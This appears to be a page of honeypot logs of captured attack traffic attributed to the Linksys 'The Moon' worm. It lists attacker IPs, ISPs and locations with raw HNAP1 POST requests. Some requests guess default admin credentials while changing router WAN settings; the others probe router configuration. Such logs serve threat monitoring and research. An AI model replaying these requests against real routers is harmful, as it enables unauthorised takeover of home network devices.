1-10 of 182 results (19 pages)
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:41:01
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 506
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.178.35.134</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.178.35.222</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:41:00
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 503
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46cGFzc3dvcmQ=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.72.79.90</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.72.79.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:40:59
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 507
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46MTIzNA==
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.205.167.36</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.205.167.237</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
66.220.85.56
Dest. port: 80
Time: 26/09/2020 06:40:57
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
rDNS: ftth-dhlg-85-56.hamiltoncom.net
POST /HNAP1/ HTTP/1.0
soapaction: http://purenetworks.com/HNAP1/SetWanSettings
Content-Length: 505
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46YWRtaW4=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.107.18.75</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.107.18.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
161.97.83.83
Dest. port: 80
Time: 18/09/2020 15:16:50
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS51167 Contabo GmbH
Location: Bavaria, Nuremberg (zipcode 90475)
rDNS: vmi448256.contaboserver.net
POST /HNAP1/ HTTP/1.1
Content-Length: 345
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 110.216.28.197
referer: http://110.216.28.197/
Content-Type: text/xml; charset=UTF-8
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/">
</GetRouterLanSettings2>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
161.97.83.83
Dest. port: 80
Time: 18/09/2020 15:16:50
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS51167 Contabo GmbH
Location: Bavaria, Nuremberg (zipcode 90475)
rDNS: vmi448256.contaboserver.net
POST /HNAP1/ HTTP/1.1
Content-Length: 331
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWanSettings"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 110.216.28.197
referer: http://110.216.28.197/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetWanSettings>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
161.97.83.83
Dest. port: 80
Time: 18/09/2020 15:16:49
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS51167 Contabo GmbH
Location: Bavaria, Nuremberg (zipcode 90475)
rDNS: vmi448256.contaboserver.net
POST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 110.216.28.197
referer: http://110.216.28.197/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<IsDeviceReady xmlns="http://purenetworks.com/HNAP1/">
</IsDeviceReady>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
161.97.83.83
Dest. port: 80
Time: 18/09/2020 15:16:49
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS51167 Contabo GmbH
Location: Bavaria, Nuremberg (zipcode 90475)
rDNS: vmi448256.contaboserver.net
POST /HNAP1/ HTTP/1.1
Content-Length: 329
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 110.216.28.197
referer: http://110.216.28.197/
Content-Type: text/xml; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadios xmlns="http://purenetworks.com/HNAP1/">
</GetWLanRadios>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
54.37.203.245
Dest. port: 80
Time: 02/09/2020 22:47:36
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Saarland, Saarbrücken (zipcode 66123)
rDNS: ip245.ip-54-37-203.eu
POST /HNAP1/ HTTP/1.1
Content-Length: 345
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 176.94.18.109
referer: http://176.94.18.109/
Content-Type: text/xml; charset=UTF-8
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/">
</GetRouterLanSettings2>
</soap:Body>
</soap:Envelope>
Linksys "The Moon" Worm
[Attack info]
Attacker:
54.37.203.245
Dest. port: 80
Time: 02/09/2020 22:47:36
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Saarland, Saarbrücken (zipcode 66123)
rDNS: ip245.ip-54-37-203.eu
POST /HNAP1/ HTTP/1.1
Content-Length: 337
accept-language: en-US;q=0.6,en;q=0.4
accept-encoding: deflate, gzip, identity
soapaction: "http://purenetworks.com/HNAP1/GetRouterSettings"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: 176.94.18.109
referer: http://176.94.18.109/
Content-Type: text/xml; charset=UTF-8
authorization: Basic Og==
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterSettings xmlns="http://purenetworks.com/HNAP1/">
</GetRouterSettings>
</soap:Body>
</soap:Envelope>